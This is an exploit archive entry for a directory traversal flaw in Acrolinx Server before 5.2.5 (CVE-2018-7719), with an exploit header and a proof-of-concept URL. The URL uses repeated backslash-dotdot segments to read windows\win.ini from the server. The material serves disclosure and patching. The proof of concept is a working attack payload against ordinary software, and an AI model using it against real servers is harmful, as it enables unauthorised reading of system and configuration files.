Acrolinx Server Directory Traversal

Acrolinux Server versions prior to 5.2.5 suffer from a directory traversal vulnerability.


MD5 | f8c6b5cf05fb6853a6c28915b9aec4cc

# Exploit Title: Acrolinx Dashboard Directory Traversal
# CVE: CVE 2018-7719
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5

PoC

Acrolinx dashboard windows works on the server.


http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html


Related Posts

Comments